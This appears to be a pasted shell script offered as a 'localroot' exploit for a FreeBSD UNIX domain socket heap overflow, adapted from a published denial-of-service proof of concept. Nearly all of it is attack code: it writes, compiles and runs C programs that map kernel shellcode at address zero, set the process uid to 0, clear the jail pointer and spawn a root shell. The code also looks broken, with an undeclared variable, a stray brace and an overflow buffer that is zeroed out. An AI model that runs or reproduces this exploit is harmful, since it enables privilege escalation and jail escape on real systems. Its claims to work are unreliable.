Untitled

#!/bin/sh
# HaqNET PROP3R localroot exploit for the UNIX domain socket overfl0w
# fbsd-uipc-heapx.sh -Original DoS by Shaun Colley <scolley@ioactive.com> 29/09/11
# PoC local DoS for the Freebsd UNiX domain sockets heap overflow.
# This was tested on Freebsd 8.2-RELEASE && 7.3-RELEASE
# see advisory & patches for details:
# http://www.securityfocus.com/archive/1/519864/30/0/threaded
# PoC will usually result in a kernel panic with a read access
# violation at 0x616161XX but sometimes the kernel will not crash straight
# away (particularly if you shorten the length of 'sun_path' -- try 140 bytes)
# and your uid (see output of `id`) may have been modified to the
# decimal equivalent of 0x61616161 during the heap smash
###############################################################################
################ debug and change how you like it.. DONT change sun_path buffer,it is setup right
################ should NOT d0s local box
################ feedback? HaqNET.NET // SSL IRCD
# server
cat > srv.c << _EOF
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/types.h>
#include <sys/event.h>
#include <fcntl.h>
#include <sys/param.h>
#include <sys/linker.h>
#include <sys/proc.h>
#include <string.h>

volatile int gotroot = 0;
static void kernelcode(void) {
struct thread *thread;
gotroot = 1;
asm(
"movl %%fs:0, %0"
: "=r"(thread)
);
thread->td_proc->p_ucred->cr_uid = 0;
thread->td_proc->p_ucred->cr_prison = NULL; // jaillll break!
return;
}

static void code_end(void) {
return;
}

struct socky {
short sun_family;
char sun_path[140];
};

int connhandler(int incoming) {
char buffer[256];
int n = 0;
n = read(incoming, buffer, 256);
buffer[n] = 0;
printf("%s\n", buffer);
n = sprintf(buffer, "~ FreeBSD uIPC socket heap overflow explo1t - HaqNET ~");
write(incoming, buffer, n);
//close(incoming);
return 0;
}

int main(void) {
struct socky overfl0w;
int sock, incoming;
socklen_t alen;
pid_t child;
char buf[160];
sock = socket(PF_UNIX, SOCK_STREAM, 0);
if(sock < 0) {
printf("socket fail\n");
return 1;
}
memset(&overfl0w, 0, sizeof(struct socky));
overfl0w.sun_family = AF_UNIX;
//memset(buf, 0x61, sizeof(buf)); // 0x61 = crash c0de
memset(buf, 0, sizeof(buf));
buf[sizeof(buf)-1] = 0x00;
strcpy(overfl0w.sun_path, buf);
memcpy(0, &kernelcode, &code_end - &kernelcode);
if(bind(sock, (struct sockaddr *)&overfl0w,sizeof(struct socky)) != 0) {
printf("bind fail\n");
return 1;
}
if(listen(sock, 5) != 0) {
printf("listen fail\n");
return 1;
}
while((incoming = accept(sock, (struct sockaddr *)&overfl0w, &alen)) > -1) {
child = fork();
if(child == 0) {
while (!gotroot && i++ < 4000)
usleep(100);
setuid(0);
execl("/bin/sh", "/bin/sh", NULL);
return connhandler(incoming);
//setuid(0);
//execl("/bin/sh", "/bin/sh", NULL);
}
//close(incoming);
}
close(sock);
return 0;
}
}
_EOF

gcc srv.c -o srv

#client
cat > cli.c << _EOF
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <string.h>
#include <sys/linker.h>
#include <sys/proc.h>

struct socky {
short sun_family;
char sun_path[140];
};

int main(void) {
int i;
struct socky overfl0w;
int  sock, n;
char buffer[256], buf[160];
sock = socket(PF_UNIX, SOCK_STREAM, 0);
if(sock < 0) {
printf("socket fail\n");
return 1;
}
memset(&overfl0w, 0, sizeof(struct sockaddr_un));
overfl0w.sun_family = AF_UNIX;
//memset(buf, 0x61, sizeof(buf)); // 0x61 = crash / local d0s
memset(buf, 0, sizeof(buf));
buf[sizeof(buf)-1] = 0x00;
strcpy(overfl0w.sun_path, buf);
//memcpy(0, &kernelcode, &code_end - &kernelcode);
if(connect(sock,(struct sockaddr *)&overfl0w,sizeof(struct socky)) != 0) {
printf("connect fail\n");
return 1;
}
//n = snprintf(buffer, 256, "panic");
write(sock, buffer, n);
n = read(sock, buffer, 256);
buffer[n] = 0;
printf("%s\n", buffer);
//setuid(0);
//execl("/bin/sh", "/bin/sh", NULL);
//close(sock);
return 0;
}
_EOF
gcc cli.c -o cli
./cli &
./srv


#if(!debug) {
#printf("listen fail\n");
#return 1;
#}
#id
#whoami